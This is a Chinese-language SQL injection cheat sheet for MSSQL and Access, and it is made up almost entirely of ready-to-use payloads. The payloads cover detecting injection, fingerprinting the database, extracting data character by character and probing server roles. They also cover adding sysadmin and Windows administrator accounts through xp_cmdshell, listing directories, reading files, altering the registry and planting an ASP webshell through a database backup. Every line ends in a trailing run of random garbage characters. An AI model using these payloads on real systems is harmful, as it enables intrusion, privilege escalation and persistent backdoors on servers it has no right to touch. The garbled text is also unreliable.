1.判断是否有注入;and 1=1 ;and 1=2 -�$tf�`� �
2.初步判断是否是mssql ;and user>0 M�v7=ZA�m�
BX-�f�V��|
3.注入参数是字符'and [查询条件] and ''=' >��%i]��p�
�|t��d�sg
4.搜索时没过滤参数的'and [查询条件] and '%25'=' H#FH�'@��J
\�oy8)o/Gb
5.判断数据库系统 l$J2|\M��6
9f�_�Q��s4
;and (select count(*) from sysobjects)>0 mssql qJY�Es�I2M
�`z~L���0h
;and (select count(*) from msysobjects)>0 access �8;Eg>_cL:
XG;Dj<�Dm�
@@�} ]q�T*
f&8�8��N<)
6.猜数据库 ;and (select Count(*) from [数据库名])>0 �@�r�9[&
GRj#1OqL�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 �IXof-�I%8
@lTd,�V�5f
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 j�V�~+=(w)
bm#/ KT_�8
9.(1)猜字段的ascii值(access) `�&5_~4T�7
<-O^�ol,fX
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 eg(�1kDMpn
��<j��IuVX
(2)猜字段的ascii值(mssql) {^���_��K
A? �T25<}�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 v/~�L�f�i�
FN�"Ye�*d�
10.测试权限结构(mssql) #Z�1
<lAy�
*rv�7#!]�.
�MoM�xKmI�
*�(CV O�Y~
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- �$[{�Y�E[a
�7Kn}KO!Y8
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- uE-|]Q��Qo
~U<=SyZYo
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- WIYWq�l>*�
d�j5@9��X�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- Twq,���6X-
`!l��Qd}W�
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 'A)�9h7�k}
LQXM�G��gp
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- yL"�UBe}�v
%1�z�`/��B
;and 1=(select IS_MEMBER('db_owner'));-- �_�l{_n2D-
U_�<k*o@�:
y?ypRCgO.u
H�A]��5:ck
11.添加mssql和系统的帐户 �T/iZ"\(~w
��)�kvrQ�6
;exec master.dbo.sp_addlogin username;-- _<6B.{$\7m
;exec master.dbo.sp_password null,username,password;-- �`�=19iAp.
zr^"z�cfz&
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- �<P0&!�y�N
?eOw8�Ro�m
;exec master.dbo.xp_cmdshell 'net user username password ;��(�Kj-,>
DQ9}(���'^
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- z(Q� 5?�+P
IA^*?,AZy
;exec master.dbo.xp_cmdshell 'net user username password /add';-- ��]@
N::!m
$n��_ax\15
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- AGK{t��+`�
Z:.*f��s�5
\fJ���_�,
]!v\whZ�>
12.(1)遍历目录 E�3Q���yiW
�d~z%kl
5:
;create table dirs(paths varchar(100), id int) kadw�1s�Yj
A&L2&ofV&q
;insert dirs exec master.dbo.xp_dirtree 'c:\' �Wh^�wKF~%
X{tfF!+iy�
;and (select top 1 paths from dirs)>0 rL|���9Xru
.�9@y*_�9�
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) g![?P"i^t
Hl=M{)q@ �
3h�**y
%^
L&G5 kY��`
(2)遍历目录 &{Z�TtK&JF
sjG@��4O�r
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- L^e��%oQ>s
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 k@^T<��C�i
O�z-�@e%8L
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 j71RlS��73
gIY]hC.�
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 8Dc��IM(;Z
3�.w &e0Es
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ��6�7]!xy
a�}V�<CBi
�x/�uC)xm�
O]�80";Uv�
13.mssql中的存储过程 �$aDk�Z�j�
y�4Lh���:;
xp_regenumvalues 注册表根键, 子键 t�G*HUN?*�
��b�j7r"_
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 �1R"Z�+tNB
(\��H^�KEy
xp_regread 根键,子键,键值名 F&$~]�R=�&
/�TY=ig1z�
;exec xp_regread x����bD]EC
�g]jCR�*]�
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 g<^-[�w4�/
�->��`R[�k
xp_regwrite 根键,子键, 值名, 值类型, 值 ,$bK)|�pGV
u+�q�j_Ej
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 �A9o"L.o)
ub]"�b[j\1
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 5�v"���S�v
2 sK\.yS
xp_regdeletevalue 根键,子键,值名 <8BN���qbX
%:yV�jb,Yf
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 Vu;z��|�L�
g�fQ1�p�?�
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �X{8g2](z.
Pa-{bhllu)
j�O}<W�1qy
�][B>`g�C-
14.mssql的backup创建webshell s��_cur-��
KEo?Cy?%ff
use model <uvA([r=Vq
mOnt�c6&]
create table cmd(str image); 5��#Et.P�'
�{~EP�P
.
insert into cmd(str) values (''); 8SoTABHV�
�q+W*�?�a)
backup database model to disk='c:\l.asp'; PH>`//D%n?
Qq3�UC�%Z1
�I���\@`AU
{Q�Vs[
J�1
15.mssql内置函数 �
>f*Zf(F
ASUleOI79(
;and (select @@version)>0 获得Windows的版本号 EM!9_�8� f
>��r��.W \
;and user_name()='dbo' 判断当前系统的连接用户是不是sa VF:95F;@��
0�X4I-�xx#
;and (select user_name())>0 爆当前系统的连接用户 w3�jci�t|�
XP�T�@� LM
;and (select db_name())>0 得到当前连接的数据库 m�.ej��Gm?
=�DwY��-Ex
}Apn.DYbbf
6-QcHJ>m6U
16.简洁的webshell r=S,/��N(1
g)�n�T]+&�
use model 3c[]P2�Bh�
��,D2n��Uk
create table cmd(str image); ��U
���U@�
b)7�v��-1N
insert into cmd(str) values (''); �(W5JVk_�o
eu0�j�j�eB
backup database model to disk='g:\wwwtest\l.asp';
